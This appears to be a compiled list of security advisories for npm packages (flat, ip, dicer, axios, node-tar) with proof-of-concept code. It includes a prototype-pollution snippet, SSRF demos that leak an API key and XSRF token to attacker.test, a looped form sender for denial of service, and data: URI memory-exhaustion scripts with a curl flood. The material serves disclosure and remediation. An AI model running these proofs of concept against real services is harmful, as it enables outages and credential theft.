All the vulnerabilities related to version 1.64.2 of the package
flat vulnerable to Prototype Pollution
flat helps flatten/unflatten nested JavaScript objects. A vulnerability classified as critical was found in hughsk/flat up to 5.0.0. It affects the function unflatten of the file index.js. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack can be initiated remotely. Upgrading to version 5.0.1 addresses this issue; the name of the patch is 20ef0ef55dfa028caddaedbcb33efbdb04d18e13. It is recommended to upgrade the affected component. The identifier VDB-216777 was assigned to this vulnerability.
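A minimal sketch of the reported attack pattern, assuming a vulnerable flat version below 5.0.1 (the key and value are illustrative):
```js
// Sketch: on flat < 5.0.1, a dotted key that targets __proto__ lets unflatten()
// write onto Object.prototype, so every object inherits the attacker's property.
const { unflatten } = require('flat');

unflatten({ '__proto__.polluted': true });

console.log(({}).polluted); // "true" on vulnerable versions, "undefined" on 5.0.1+
```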
ip SSRF improper categorization in isPublic
The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.
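A small sketch of the misclassification, using the addresses listed in the advisory (behavior assumed for affected versions up to 2.0.1):
```js
// Sketch: on affected versions of the ip package, these local / non-routable
// addresses may be reported as public, which can defeat SSRF allowlists
// built on isPublic().
const ip = require('ip');

for (const addr of ['127.1', '01200034567', '012.1.2.3', '000:0:0000::01', '::fFFf:127.0.0.1']) {
  console.log(addr, ip.isPublic(addr)); // expected: false for all; affected versions may return true
}
```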
Crash in HeaderParser in dicer
This affects all versions of the package dicer. A malicious attacker can send a modified form to the server and crash the Node.js service. A complete denial of service can be achieved by sending the malicious form in a loop.
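As a rough sketch of that loop-based attack pattern (the target host, port, path, and the malformed body below are illustrative assumptions; the exact crashing payload is not reproduced here):
```js
const http = require('http');

// Deliberately malformed multipart body (truncated part header).
const boundary = '----boundary';
const body = `--${boundary}\r\nContent-Disposition: form-data; name="a`;

function send() {
  const req = http.request(
    {
      host: 'localhost', // illustrative target running a dicer-based upload endpoint
      port: 3000,
      path: '/upload',
      method: 'POST',
      headers: { 'Content-Type': `multipart/form-data; boundary=${boundary}` },
    },
    (res) => res.resume()
  );
  req.on('error', () => {}); // keep looping even if the service has already crashed
  req.end(body);
}

// "sending the malicious form in a loop"
setInterval(send, 100);
```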
Axios Cross-Site Request Forgery Vulnerability
An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host, allowing attackers to view sensitive information.
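A browser-side sketch of the behavior described above, assuming an affected axios version between 0.8.1 and 1.5.1 (attacker.test and the token value are illustrative):
```js
// Sketch: axios reads the XSRF-TOKEN cookie (set by the application's own backend
// for CSRF protection) and, on affected versions, copies it into the X-XSRF-TOKEN
// header of every request -- including requests to third-party hosts.
import axios from "axios";

document.cookie = "XSRF-TOKEN=super-secret-csrf-token";

// On an affected version this cross-origin request carries
// "X-XSRF-TOKEN: super-secret-csrf-token", disclosing the token to attacker.test.
await axios.get("https://attacker.test/collect");
```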
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if `baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Consider the following code snippet:
```js
import axios from "axios";
const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});
// const userId = "123";
const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF
```
In this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers.
It is recommended that:
- Even if `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`.
- Before sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`.
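Until axios enforces this, a caller-side guard along these lines can approximate the second recommendation (a sketch only; `example.test`, the API key header, and the helper name are illustrative and not axios API):
```js
import axios from "axios";

const baseURL = "http://example.test/api/v1/users/";
const internalAPIClient = axios.create({
  baseURL,
  headers: { "X-API-KEY": "1234567890" },
});

// Resolve the user-supplied value against baseURL and refuse anything that
// escapes it (absolute URLs, protocol-relative URLs, "../" traversal, ...).
async function getWithinBase(userInput) {
  const resolved = new URL(userInput, baseURL).href;
  if (!resolved.startsWith(baseURL)) {
    throw new Error(`refusing request to ${resolved}: outside ${baseURL}`);
  }
  return internalAPIClient.get(resolved);
}

await getWithinBase("123"); // OK: http://example.test/api/v1/users/123
await getWithinBase("http://attacker.test/").catch((e) => console.error(e.message)); // rejected, no request sent
```
Resolving the user-supplied value against `baseURL` and checking the prefix rejects absolute URLs, protocol-relative URLs, and `../` traversal before any request is sent.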
Follow the steps below to reproduce the issue:
```sh
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
```
```js
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
```
```
$ node main.js
this is server2
```
Even though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`.
Any use of axios that relies on `baseURL` and does not validate path parameters is affected by this issue.
Axios is vulnerable to DoS attack through lack of data size check
When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.
This path ignores `maxContentLength`/`maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.
The Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When axios encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.
Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):
```js
const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];
if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}
```
The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):
```js
export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
```
This decoding is performed without checking `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams. A `data:` URI of arbitrary size can therefore cause the Node process to allocate the entire content into memory.
In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and rejects when `totalResponseBytes` exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.
```js
const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;
  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });
  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});
```
Run with limited heap to force a crash:
```
node --max-old-space-size=100 poc.js
```
Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:
```
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
```
Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows `data:` URLs, for which axios ignores `maxContentLength` and `maxBodyLength` and fully decodes the payload into memory on Node before streaming, enabling DoS.
```js
import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";
const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
timeout: 10000,
maxRedirects: 5,
httpAgent, httpsAgent,
headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
validateStatus: c => c >= 200 && c < 400
});
const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";
app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));
app.get("/healthz", (req,res)=>res.send("ok"));
/**
* POST /preview { "url": "<http|https|data URL>" }
* Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
*/
app.post("/preview", async (req, res) => {
const url = req.body?.url;
if (!url) return res.status(400).json({ error: "missing url" });
let u;
try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }
// Developer allows using data:// in the allowlist
const allowed = new Set(["http:", "https:", "data:"]);
if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });
const controller = new AbortController();
const onClose = () => controller.abort();
res.on("close", onClose);
const before = process.memoryUsage().heapUsed;
try {
const r = await axiosClient.get(u.toString(), {
responseType: "stream",
maxContentLength: 8 * 1024, // Axios will ignore this for data:
maxBodyLength: 8 * 1024, // Axios will ignore this for data:
signal: controller.signal
});
// stream only the first 64KB back
const cap = 64 * 1024;
let sent = 0;
const limiter = new PassThrough();
r.data.on("data", (chunk) => {
if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
else { sent += chunk.length; limiter.write(chunk); }
});
r.data.on("end", () => limiter.end());
r.data.on("error", (e) => limiter.destroy(e));
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
limiter.pipe(res);
} catch (err) {
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
res.status(502).json({ error: String(err?.message || err) });
} finally {
res.off("close", onClose);
}
});
app.listen(PORT, () => {
console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});
```
Run this app and send 3 POST requests:
```sh
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null
```
Enforce size limits: for `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit (a caller-side approximation is sketched below).
Stream decoding: instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
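Until a check like the first suggestion exists in axios itself, callers can approximate it before handing a `data:` URI to axios (a sketch; the helper name and the limit are illustrative):
```js
// Sketch: estimate the decoded size of a data: URI up front, since axios's
// maxContentLength / maxBodyLength are not applied to the data: scheme.
function assertDataUriWithinLimit(uri, maxBytes) {
  const comma = uri.indexOf(',');
  if (!uri.startsWith('data:') || comma === -1) throw new Error('not a data: URI');
  const isBase64 = uri.slice(0, comma).includes(';base64');
  const payloadLength = uri.length - comma - 1;
  // Base64 decodes to roughly 3/4 of its encoded length.
  const approxDecodedBytes = isBase64 ? Math.floor(payloadLength * 3 / 4) : payloadLength;
  if (approxDecodedBytes > maxBytes) {
    throw new Error(`data: URI too large: ~${approxDecodedBytes} bytes > ${maxBytes}`);
  }
  return uri;
}

// Usage: reject oversized data: URIs before axios decodes them into memory.
// const response = await axios.get(assertDataUriWithinLimit(url, 8 * 1024), { responseType: 'arraybuffer' });
```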
Denial of service while parsing a tar file due to lack of folders count validation
During some analysis on npm's node-tar package, I came across the folder creation process. Basically, if you provide node-tar with a path like ./a/b/c/foo.txt, it creates every folder and sub-folder along the way (a, b, and c) until it reaches the last component and creates foo.txt. I noticed that there is no validation at all on the number of folders being created, so it is possible to exhaust the CPU and memory of the system running node-tar, and even crash the Node.js client within a few seconds, by using a path with too many nested sub-folders.
You can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it; you should get the same behavior as in the video.
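For reference, a minimal extraction sketch (assuming the crafted archive from the resources is saved locally as `deep-folders.tar`; the file and directory names are illustrative):
```js
// Sketch: extracting the crafted archive with node-tar. On affected versions,
// the deeply nested entry path makes extraction create folders without limit,
// consuming CPU and memory until the process runs out of heap.
const fs = require('fs');
const tar = require('tar');

fs.mkdirSync('./extract-target', { recursive: true });

tar.x({ file: 'deep-folders.tar', cwd: './extract-target' })
  .then(() => console.log('extraction finished'))
  .catch((err) => console.error('extraction failed:', err));
```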
Here's a video showcasing the exploit:
Denial of service by crashing the Node.js client when attempting to parse a tar archive, making it run out of heap memory and consuming server CPU and memory resources.
This issue was originally reported to the GitHub bug bounty program; they asked me to report it to you a month ago.